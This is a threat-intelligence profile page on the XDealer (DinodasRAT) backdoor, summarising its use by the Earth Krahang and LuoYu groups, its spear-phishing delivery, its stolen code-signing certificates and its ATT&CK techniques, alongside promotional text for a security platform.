XDealer
XDealer is a backdoor/RAT used in cyberespionage operations and is also referred to in the provided content as DinodasRAT. It has been associated with the China-nexus activity clusters Earth Krahang and LuoYu. In Earth Krahang intrusions, researchers reported that since 2023 the actor shifted from the RESHELL backdoor to XDealer because it provides more comprehensive backdoor capabilities, and observed both Windows and Linux variants. XDealer was delivered during the initial stage of attacks via spear-phishing or deployment through web shells on compromised servers. In one documented case, a compromised government mailbox sent a malicious RAR archive containing an LNK file that installed XDealer and displayed a decoy document related to the targeted agency. The broader Earth Krahang campaign targeted government entities worldwide, especially foreign affairs and other ministries, with a concentration in Southeast Asia and additional victims in Europe, the Americas, and Africa. The content also notes that LuoYu newly used XDealer alongside ShadowPad and PlugX. A notable artifact reported for some XDealer loaders is that they were signed with certificates issued by GlobalSign to the Chinese companies 上海笑聘网络科技有限公司 and 上海指聚网络科技有限公司, which researchers assessed were likely stolen and abused.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Since 2023, the Earth Krahang shifted to another backdoor (named XDealer by TeamT5 and DinodasRAT by ESET). Compared to RESHELL, XDealer provides more comprehensive backdoor capabilities.
Since 2023, the Earth Krahang shifted to another backdoor (named XDealer by TeamT5 and DinodasRAT by ESET). Compared to RESHELL, XDealer provides more comprehensive backdoor capabilities.
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
6 techniquesEarth Krahang abuses the trust between governments to conduct their attacks. We found that the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses belonging to the same entity.
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
we found that some of the XDealer DLL loaders were signed with valid code signing certificates issued by GlobalSign to two Chinese companies.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Since the malicious link uses a legitimate government domain of the compromised server, it will appear less suspicious to targets and may even bypass some domain blacklists.
Initial Access
3 techniquesThe threat actor abused the following vulnerabilities multiple times: CVE-2023-32315: command execution on OpenFire; CVE-2022-21587: command execution on Oracle Web Applications Desktop Integrator.
Earth Krahang also makes use of spear phishing email to attack its targets... In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Execution
3 techniquesthe emails are intended trick their targets into opening attachments or embedded URL links that ultimately lead to the execution of a prepared backdoor file on the victim’s machine.
The malicious attachment was a RAR archive containing an LNK file that deployed the Xdealer malware and opened a decoy document.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
1 techniquebackdoor filenames are usually related to geopolitical topics... 'Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe'
Lateral Movement
1 techniquethe actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses belonging to the same entity.
Command and Control
2 techniquesIts binaries are packed with ConfuserEX and its command-and-control (C&C) communication is encrypted with the AES algorithm.
uses certutil commands to download and install the SoftEther VPN server.
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Xdealer is a backdoor malware deployed via spear-phishing campaigns by the Earth Krahang APT group. It is used to gain persistent access to victim systems, enabling espionage and further malicious activity.
A more feature-rich backdoor used on both Windows and Linux. Early packages included an installer, XDealer DLL, stealer module DLL, ID file, and LNK/loader. The stealer module can take screenshots, steal clipboard data, and log keystrokes.
Malware newly used by LuoYu since JSAC2021 (no further technical detail provided in the content).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.